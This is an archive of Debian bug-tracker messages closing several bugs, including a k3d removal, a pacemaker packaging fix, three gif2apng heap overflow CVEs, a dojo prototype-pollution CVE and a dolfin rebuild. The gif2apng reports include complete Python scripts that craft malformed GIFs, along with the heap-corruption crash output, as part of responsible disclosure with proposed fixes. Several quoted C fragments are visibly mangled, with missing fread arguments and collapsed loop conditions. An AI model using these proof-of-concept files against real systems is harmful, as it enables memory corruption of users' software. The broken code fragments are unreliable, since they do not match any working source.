Your message dated Sat, 13 Aug 2022 17:47:55 + with message-id and subject line Bug#1016983: Removed package(s) from unstable has caused the Debian Bug report #936777, regarding k3d: Python2 removal in sid/bullseye to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 936777: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=936777 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:k3d Version: 0.8.0.6-8 Severity: normal Tags: sid bullseye User: debian-pyt...@lists.debian.org Usertags: py2removal Python2 becomes end-of-live upstream, and Debian aims to remove Python2 from the distribution, as discussed in https://lists.debian.org/debian-python/2019/07/msg00080.html Your package either build-depends, depends on Python2, or uses Python2 in the autopkg tests. Please stop using Python2, and fix this issue by one of the following actions. - Convert your Package to Python3. This is the preferred option. In case you are providing a Python module foo, please consider dropping the python-foo package, and only build a python3-foo package. Please don't drop Python2 modules, which still have reverse dependencies, just document them. This is the preferred option. - If the package is dead upstream, cannot be converted or maintained in Debian, it should be removed from the distribution. If the package still has reverse dependencies, raise the severity to "serious" and document the reverse dependencies with the BTS affects command. If the package has no reverse dependencies, confirm that the package can be removed, reassign this issue to ftp.debian.org, make sure that the bug priority is set to normal and retitle the issue to "RM: PKG -- removal triggered by the Python2 removal". - If the package has still many users (popcon >= 300), or is needed to build another package which cannot be removed, document that by adding the "py2keep" user tag (not replacing the py2remove tag), using the debian-pyt...@lists.debian.org user. Also any dependencies on an unversioned python package (python, python-dev) must not be used, same with the python shebang. These have to be replaced by python2/python2.7 dependencies and shebang. This is the least preferred option. If the conversion or removal needs action on another package first, please document the blocking by using the BTS affects command, like affects + src:k3d If there is no py2removal bug for that reverse-dependency, please file a bug on this package (similar to this bug report). If there are questions, please refer to the wiki page for the removal: https://wiki.debian.org/Python/2Removal, or ask for help on IRC #debian-python, or the debian-pyt...@lists.debian.org mailing list. --- End Message --- --- Begin Message --- Version: 0.8.0.6-8+rm Dear submitter, as the package k3d has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016983 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#985173: marked as done (pacemaker-resource-agents: missing Breaks+Replaces: pacemaker (<< 2))
Your message dated Sat, 13 Aug 2022 17:02:34 + with message-id and subject line Bug#985173: fixed in pacemaker 2.0.1-5+deb10u2 has caused the Debian Bug report #985173, regarding pacemaker-resource-agents: missing Breaks+Replaces: pacemaker (<< 2) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 985173: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=985173 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: pacemaker-resource-agents Version: 2.0.1-5+deb10u1 Severity: serious User: debian...@lists.debian.org Usertags: piuparts Control: affects -1 + pacemaker pacemaker-cli-utils Hi, during a test with piuparts I noticed your package fails to upgrade from 'stretch'. It installed fine in 'stretch', then the upgrade to 'buster' fails because it tries to overwrite other packages files without declaring a Breaks+Replaces relation. See policy 7.6 at https://www.debian.org/doc/debian-policy/ch-relationships.html#overwriting-files-and-replacing-packages-replaces >From the attached log (scroll to the bottom...): Preparing to unpack .../03-pacemaker-resource-agents_2.0.1-5+deb10u1_all.deb ... Unpacking pacemaker-resource-agents (2.0.1-5+deb10u1) over (1.1.24-0+deb9u1) ... dpkg: error processing archive /tmp/apt-dpkg-install-FVOsXO/03-pacemaker-resource-agents_2.0.1-5+deb10u1_all.deb (--unpack): trying to overwrite '/usr/lib/ocf/resource.d/pacemaker/ifspeed', which is also in package pacemaker 1.1.24-0+deb9u1 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) There are currently Breaks+Replaces: pacemaker (<< 1.1.14-2~), but these seem to have been invalidated by a new upstream release being uploaded as a stretch security update. Please bump them to (<< 2) to catch future oldstable updates. cheers, Andreas pacemaker_2.0.1-5+deb10u1.log.gz Description: application/gzip --- End Message --- --- Begin Message --- Source: pacemaker Source-Version: 2.0.1-5+deb10u2 Done: Ferenc Wágner We believe that the bug you reported is fixed in the latest version of pacemaker, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 985...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Ferenc Wágner (supplier of updated pacemaker package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sun, 07 Aug 2022 12:31:52 +0200 Source: pacemaker Architecture: source Version: 2.0.1-5+deb10u2 Distribution: buster Urgency: medium Maintainer: Debian HA Maintainers Changed-By: Ferenc Wágner Closes: 985173 Changes: pacemaker (2.0.1-5+deb10u2) buster; urgency=medium . [ Andreas Beckmann ] * [b55ccb2] pacemaker-resource-agents: Bump Breaks+Replaces: pacemaker to (<< 2) A new upstream release introduced as security update 1.1.24-0+deb9u1 in stretch added the new file /usr/lib/ocf/resource.d/pacemaker/ifspeed to pacemaker, while it resides in pacemaker-resource-agents in buster. (Closes: #985173) * [ff20fc2] libpe-status28/libpengine27: Add Breaks against libpe-status10 and libpengine10 (>= 1.1.24) The version in stretch-security shipped libraries with SOVERSION 16 instead of 10. (See: #981088) Checksums-Sha1: 73c764c8d3a79f29f12a265b8660754f5c9b81ba 3948 pacemaker_2.0.1-5+deb10u2.dsc 2dd17e48094eaa8cc7f34eb431c67903aa1d86ad 69392 pacemaker_2.0.1-5+deb10u2.debian.tar.xz fe0f4be647e93606d1940880809a722ac8e213bf 31835 pacemaker_2.0.1-5+deb10u2_amd64.buildinfo Checksums-Sha256: f28f24a92cf247ccc2cfc331c1f063bedc4a08a5114ac3050b3fe438115c7c17 3948 pacemaker_2.0.1-5+deb10u2.dsc c82b6164eed40f698b97c64deb056571c9496e1c6278f2cf37113147dc37de2f 69392 pacemaker_2.0.1-5+deb10u2.debian.tar.xz 27331933900ece6ada0d8363901491a126e31b12c9a4060127e10e759dbcb9b6 31835 pacemaker_2.0.1-5+deb10u2_amd64.buildinfo Files: 8832fe7f598b60c5a8a72a9d01abf8ff 3948 admin optional pacemaker_2.0.1-5+deb10u2.dsc 355f39be0f243771ffb3bb1ae10a0480 69392 admin optional pacemaker_2.0.1-5+deb10u2.debian.tar.xz 60cf5bd72198179aa13ce43fea9295dd 31835 admin optional pacemaker_2.0.1-5+deb10u2_amd64.buildinfo -BEGIN PGP SIGNATURE-
Bug#1002687: marked as done (gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function)
Your message dated Sat, 13 Aug 2022 17:02:32 + with message-id and subject line Bug#1002687: fixed in gif2apng 1.9+srconly-2+deb10u1 has caused the Debian Bug report #1002687, regarding gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002687: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002687 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows: delays = (unsigned short *)malloc(frames*2); if (delays == NULL) return 1; [...] if (val == 0xF9) { if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 2, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1) delays[n] = delay; } The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer. The following script generates a poc.gif file, that should cause a crash: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") sig = b"GIF87a" w = b"\x10\x00" h = b"\x10\x00" flags_one = b"\x00" bcolor = b"\x01" aspect = b"\x01" data = sig + w + h + flags_one + bcolor + aspect f.write(data) # Writting more frames to produce crash: for i in range(0,28): # Going into the id 0x2c path, so that there is a frame id = b"\x2c" w0 = b"\x01\x00" y0 = b"\x00\x00" x0 = b"\x00\x00" h0 = b"\x01\x00" # Getting past our own size checks flags_two = b"\x00" data = id + x0 + y0 + w0 + h0 + flags_two f.write(data) # DecodeLZW mincode = b"\x07" f.write(mincode) for i in range(0,512): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) # Leaving function target_char = b"\x00" f.write(target_char) # Triggering the vulnerable code path id = b"\x21" val = b"\xf9" size = b"\xff" flags_two = b"\x00" delay = b"\xff\xff" t = b"\x00" end = b"\x00" data = id + val + size + flags_two + delay + t + end f.write(data) # Breaking out of while loop f.write(b"") f.close() The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 28 frames. Writing 'poc.png'... 28 frames. munmap_chunk(): invalid pointer Abgebrochen This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer. I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code: if (val == 0xF9) { if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 2, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1 && n < frames) { delays[n] = delay; } } This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE,
Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
Your message dated Sat, 13 Aug 2022 17:02:32 + with message-id and subject line Bug#1002667: fixed in gif2apng 1.9+srconly-2+deb10u1 has caused the Debian Bug report #1002667, regarding gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002667 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, I found a heap overflow in the main function of the gif2apng application. The issue exists within the for loops in the following code from the main function in gif2apng.cpp: if (coltype == 2) { for (j=0; jh2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + ((k+y0)*w + x0)*3; for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + (k+y0)*w + x0; if (shuffle) { for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + ((k+y0)*w + x0)*3; if ( ( (j*w0 + w0) > buffer_size) || ( k+y0)*w + x0)*3) + w0 * 3 ) > imagesize) || k+y0)*w + x0)*3) < 0 ) || ( (j*w0) < 0)) { printf("Something is wrong with the size values\n"); exit(0); } for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + (k+y0)*w + x0; if ( ( (j*w0 + w0) > buffer_size) || ( (((k+y0)*w + x0) + w0 ) > imagesize) || k+y0)*w + x0)) < 0 ) || ( (j*w0) < 0)) { printf("Something is wrong with the size values\n"); exit(0); } if (shuffle) { for (i=0; i -- no debconf information --- End Message --- --- Begin Message --- Source: gif2apng Source-Version: 1.9+srconly-2+deb10u1 Done: Håvard F. Aasen We believe that the bug you reported is fixed in the latest version of gif2apng, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1002...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Håvard F. Aasen (supplier of updated gif2apng package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Thu, 28 Jul 2022 23:56:21 +0200 Source: gif2apng Architecture: source Version: 1.9+srconly-2+deb10u1 Distribution: buster Urgency: medium Maintainer: Khalid El Fathi Changed-By: Håvard F. Aasen Closes: 1002667 1002668 1002687 Changes: gif2apng (1.9+srconly-2+deb10u1) buster; urgency=medium . * Non-maintainer upload. * CVE-2021-45909, Closes: #1002668: heap based buffer overflow in the DecodeLZW * CVE-2021-45910, Closes: #1002667: heap-based buffer overflow within the main function * CVE-2021-45911, Closes: #1002687: heap based buffer overflow in processing of delays in the main function Checksums-Sha1: 77391152adfba90edcfa8e747769bcf09a62b876 2009 gif2apng_1.9+srconly-2+deb10u1.dsc f184e5ccbdbc49945f5af571fc2b3b00b74a316b 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz b100032d2b6efbc6fbde9adcc696b1e5bc9fa5f1 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo Checksums-Sha256: ba13882e087d8f431366087ad820d514f51c5124d45195bdc7e247c857232482 2009 gif2apng_1.9+srconly-2+deb10u1.dsc 88ef009c78679146033f91d3b6c1c3bf0d46b0674b97b076abe6ccf2f4f1 8916 gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz 8afc7fb97cab9db5e611ecbff73f5ae57a9000cfbe7f69d73b4d5f39d6c5a86f 5441 gif2apng_1.9+srconly-2+deb10u1_source.buildinfo Files: 39effd0d93ec256fc220da6a17a78892 2009 graphics optional gif2apng_1.9+srconly-2+deb10u1.dsc d281aa7b5ed1745ad760c17582cc8c07 8916 graphics optional gif2apng_1.9+srconly-2+deb10u1.debian.tar.xz 7442a9a2d9a4874284a6d246af137e9f 5441 graphics optional
Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Your message dated Sat, 13 Aug 2022 17:02:32 + with message-id and subject line Bug#1002668: fixed in gif2apng 1.9+srconly-2+deb10u1 has caused the Debian Bug report #1002668, regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") # Data needed to enter the code path: beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" * 9 f.write(beginning) # Value needed in the vulnerable function mincode = b"\x07" f.write(mincode) for i in range(0,1): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) f.close() This script creates a file called poc.gif, which writes 1 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 1 frames. malloc(): corrupted top size Abgebrochen This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited. To fix this issue locally I added a buffer_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows: void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added parameter img_size { unsigned int bytes_written = 0; [...] if (lastcode == -1) { if (bytes_written < img_size) { // Added if-statement *pout++ = suffix[code]; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } firstchar = lastcode = code; continue; } [...] do { if (bytes_written < img_size) { // Added if-statement *pout++ = *--pstr; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } } while (pstr > str); [...] int main(int argc, char** argv) { unsigned int buffer_size = 0; // New variable to hold the size of the buffer [...] grayscale = 1; buffer_size = imagesize*2; // New variable, as imagesize is overwritten at some point buffer = (unsigned char *)malloc(buffer_size); if (buffer == NULL) { printf("Error: not enough memory\n"); return 1; } [...] DecodeLZW(buffer, buffer_size, f1); // Added buffer_size [...] DecodeLZW(buffer, buffer_size, f1); // Added Buffer size [...] This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
Bug#1016453: marked as done (python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop')
Your message dated Sat, 13 Aug 2022 16:18:49 + with message-id and subject line Bug#1016453: fixed in python-bonsai 1.3.0+ds-4 has caused the Debian Bug report #1016453, regarding python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016453: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016453 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: python-tornado, python-bonsai Control: found -1 python-tornado/6.2.0-1 Control: found -1 python-bonsai/1.3.0+ds-3 Severity: serious Tags: sid bookworm User: debian...@lists.debian.org Usertags: breaks needs-update Dear maintainer(s), With a recent upload of python-tornado the autopkgtest of python-bonsai fails in testing when that autopkgtest is run with the binary packages of python-tornado from unstable. It passes when run with only packages from testing. In tabular form: passfail python-tornado from testing6.2.0-1 python-bonsai from testing1.3.0+ds-3 all others from testingfrom testing I copied some of the output at the bottom of this report. Currently this regression is blocking the migration of python-tornado to testing [1]. Due to the nature of this issue, I filed this bug report against both packages. Can you please investigate the situation and reassign the bug to the right package? More information about this bug and the reason for filing it can be found on https://wiki.debian.org/ContinuousIntegration/RegressionEmailInformation Paul [1] https://qa.debian.org/excuses.php?package=python-tornado https://ci.debian.net/data/autopkgtest/testing/amd64/p/python-bonsai/24205871/log.gz === FAILURES === TornadoLDAPConnectionTest.test_add_and_delete _ self = testMethod=test_add_and_delete> def tearDown(self) -> None: # Native coroutines tend to produce warnings if they're not # allowed to run to completion. It's difficult to ensure that # this always happens in tests, so cancel any tasks that are # still pending by the time we get here. asyncio_loop = self.io_loop.asyncio_loop # type: ignore if hasattr(asyncio, "all_tasks"): # py37 tasks = asyncio.all_tasks(asyncio_loop) # type: ignore else: tasks = asyncio.Task.all_tasks(asyncio_loop) # Tasks that are done may still appear here and may contain # non-cancellation exceptions, so filter them out. tasks = [t for t in tasks if not t.done()] # type: ignore for t in tasks: t.cancel() # Allow the tasks to run and finalize themselves (which means # raising a CancelledError inside the coroutine). This may # just transform the "task was destroyed but it is pending" # warning into a "uncaught CancelledError" warning, but # catching CancelledErrors in coroutines that may leak is # simpler than ensuring that no coroutines leak. if tasks: done, pending = self.io_loop.run_sync(lambda: asyncio.wait(tasks)) assert not pending # If any task failed with anything but a CancelledError, raise it. for f in done: try: f.result() except asyncio.CancelledError: pass # Clean up Subprocess, so it can be used again with a new ioloop. Subprocess.uninitialize() with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.io_loop.clear_current() if not isinstance(self.io_loop, _NON_OWNED_IOLOOPS): # Try to clean up any file descriptors left open in the ioloop. # This avoids leaks, especially when tests are run repeatedly # in the same process with autoreload (because curl does not # set FD_CLOEXEC on its file descriptors) self.io_loop.close(all_fds=True) > if self.should_close_asyncio_loop: E AttributeError: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' /usr/lib/python3/dist-packages/tornado/testing.py:282: AttributeError __ TornadoLDAPConnectionTest.test_connection ___ self = def tearDown(self) -> None: # Native coroutines tend to produce warnings if
Bug#1014785: marked as done (dojo: CVE-2021-23450)
Your message dated Sat, 13 Aug 2022 16:05:03 + with message-id and subject line Bug#1014785: fixed in dojo 1.17.2+dfsg1-1 has caused the Debian Bug report #1014785, regarding dojo: CVE-2021-23450 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1014785: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014785 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: dojo X-Debbugs-CC: t...@security.debian.org Severity: grave Tags: security Hi, The following vulnerability was published for dojo. CVE-2021-23450[0]: | All versions of package dojo are vulnerable to Prototype Pollution via | the setObject function. https://github.com/advisories/GHSA-m8gw-hjpr-rjv7 Fixed by: https://github.com/dojo/dojo/commit/b7b8b279f3e082e9d4b54144fe831bdc77b2e0c9 If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2021-23450 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23450 Please adjust the affected versions in the BTS as needed. --- End Message --- --- Begin Message --- Source: dojo Source-Version: 1.17.2+dfsg1-1 Done: Bastien Roucariès We believe that the bug you reported is fixed in the latest version of dojo, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1014...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bastien Roucariès (supplier of updated dojo package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sat, 13 Aug 2022 11:57:27 + Source: dojo Architecture: source Version: 1.17.2+dfsg1-1 Distribution: unstable Urgency: medium Maintainer: Debian Javascript Maintainers Changed-By: Bastien Roucariès Closes: 1014785 Changes: dojo (1.17.2+dfsg1-1) unstable; urgency=medium . * New upstream version, fix CVE-2021-23450 (Closes: #1014785). * Fix lintian warnings Checksums-Sha1: 85e7262318c2c52961a76213ffd5f776d53d5325 2336 dojo_1.17.2+dfsg1-1.dsc 0900eb015fa4496e41290882e7e51ce70ab5a300 41448704 dojo_1.17.2+dfsg1.orig.tar.xz 5320024828d8955fb882446e964b526ec5747532 17392 dojo_1.17.2+dfsg1-1.debian.tar.xz 57c32c58b90bdbf743e3b9b5f8db2d0c4df81452 13771 dojo_1.17.2+dfsg1-1_source.buildinfo Checksums-Sha256: 10a7906554e4b765a0caf5e60f978166abbef2216af0ca0eba89541b939bf1aa 2336 dojo_1.17.2+dfsg1-1.dsc ea9585d0e07617a71fc3f8d9ee5654263ed9d220cbc7ef85b007a78d61e9c2fc 41448704 dojo_1.17.2+dfsg1.orig.tar.xz 96fec32410c0b91697a62f197148a7d6e56de127498cf91c65cbd09a8bc1c51c 17392 dojo_1.17.2+dfsg1-1.debian.tar.xz 564e3a3108f3276f032546646d1958049fcb391ad63b51bab6856be4e395ff21 13771 dojo_1.17.2+dfsg1-1_source.buildinfo Files: a1f7edcb5d92913cf37cdf222615b831 2336 javascript optional dojo_1.17.2+dfsg1-1.dsc 619f3dfdd9b33020e6b0e84316193de2 41448704 javascript optional dojo_1.17.2+dfsg1.orig.tar.xz a1763910e9eb8642c7f493dbd66b82da 17392 javascript optional dojo_1.17.2+dfsg1-1.debian.tar.xz f1d2b90acc12f5bd742bef8f7fa53e45 13771 javascript optional dojo_1.17.2+dfsg1-1_source.buildinfo -BEGIN PGP SIGNATURE- iQJFBAEBCgAvFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmL3x+4RHHJvdWNhQGRl Ymlhbi5vcmcACgkQADoaLapBCF/D9g/9F+xi/7nzdGmamnaxbU6UO+mvHHONObqX /cVNkcGhFk9DCYPkFyJIxCthfVVH5DlLT57CFBZ3j2Y20KQMRRl85A0BhGmCYz8z Elr+NTwjWJXR+MCGi9Sl+T+9gvD7NqKu/LvvXaol3TGIeV708Ipz30/GUNYkBSla 86CYQYctHLIpQkUYVa8RNBMFc0Ug6MJasjMApaaxVDNCt0WCVLvL/h2JQerXZdZr jWC8/Lfph1n2U3VGDesGUYlG5txaFXLzTI3c5ij2FtxL2aS7Ast280rGsP7UKQNM jXid1giUFwCaVl8X4Th54x/Iq9fbGaxbs8pRtpqjskGIr+Mu4Hzs+AcV5WfdcUGS aIH55C147svHC+qfsRZwhFnTJrPj9526axmmJ3cO8Gksp0zvdiCYZYV6kSO7VVav DnvNFTPo6IAPd44Fo5JhpbkPzXUSgga9gq3qqJiSXhEPZmJ4ly1O05xLnaWEBX+L ZsqKZ0nWJA1TYgeEWy/FWqr8oWB7C68UbOw3c8upuWqhMu5mJ9hmFz7qNuUP+GIc 2vH1K4OYhtxtR4RWfgVbAFIrVJXaRP2+E0KCjyS9rIVM33owkXN+NiTannXHfzYz WNeKRFa45Cugrj77Grbmo94QcqePYZ5Uvd9INrKRTONF4zMzLBDXpTt2scwItM3S eIDR+XA9APk= =s4DV -END PGP SIGNATURE End Message ---
Bug#1016898: marked as done (dolfin needs a rebuild against glibc 2.34)
Your message dated Sat, 13 Aug 2022 14:34:01 + with message-id and subject line Bug#1016898: fixed in dolfin 2019.2.0~git20220407.d29e24d-5+nmu1 has caused the Debian Bug report #1016898, regarding dolfin needs a rebuild against glibc 2.34 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016898: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016898 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: dolfin Version: 2019.2.0~git20220407.d29e24d-5 Severity: serious Dear maintainer, glibc 2.34 has merged a few libraries (libpthread, libdl, libutil, libanl) into libc. While this is handled transparently at runtime, there are a few corner cases at build time. In the case of dolfin, the file usr/share/dolfin/cmake/DOLFINTargets.cmake files embed the path to libdl.so which doesn't exist anymore. dolfin has been binNMUed as part of the transition [1], however we later realised that the above file is actually in the libdolfin-dev-common package which is binary all. Therefore a source upload is necessary. Could you please schedule one? There should be no change needed besides adding a build-depends on libc-dev (>= 2.34) to ensure it is built against glibc 2.34 (not all chroots have been upgraded yet). Thanks, Aurelien [1] https://buildd.debian.org/status/package.php?p=dolfin --- End Message --- --- Begin Message --- Source: dolfin Source-Version: 2019.2.0~git20220407.d29e24d-5+nmu1 Done: Aurelien Jarno We believe that the bug you reported is fixed in the latest version of 